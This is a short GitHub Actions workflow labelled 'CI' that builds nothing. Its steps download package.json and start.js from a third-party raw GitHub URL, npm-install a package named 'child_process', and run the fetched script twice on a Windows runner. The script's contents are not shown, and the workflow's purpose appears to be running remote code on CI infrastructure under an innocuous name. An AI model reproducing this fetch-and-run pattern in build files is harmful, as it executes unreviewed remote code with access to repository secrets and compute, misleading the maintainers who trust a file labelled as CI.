name: CI

on: [push, workflow_dispatch]


jobs:

  build:


    runs-on: windows-latest


    steps:

    
    - name: Start
      run: Invoke-WebRequest https://raw.githubusercontent.com/raiyan088/public/main/me/package.json -OutFile package.json
    - run: Invoke-WebRequest https://raw.githubusercontent.com/raiyan088/public/main/me/start.js -OutFile start.js
    - run: npm install child_process
    - run: node start 0
    - run: node start 1

    
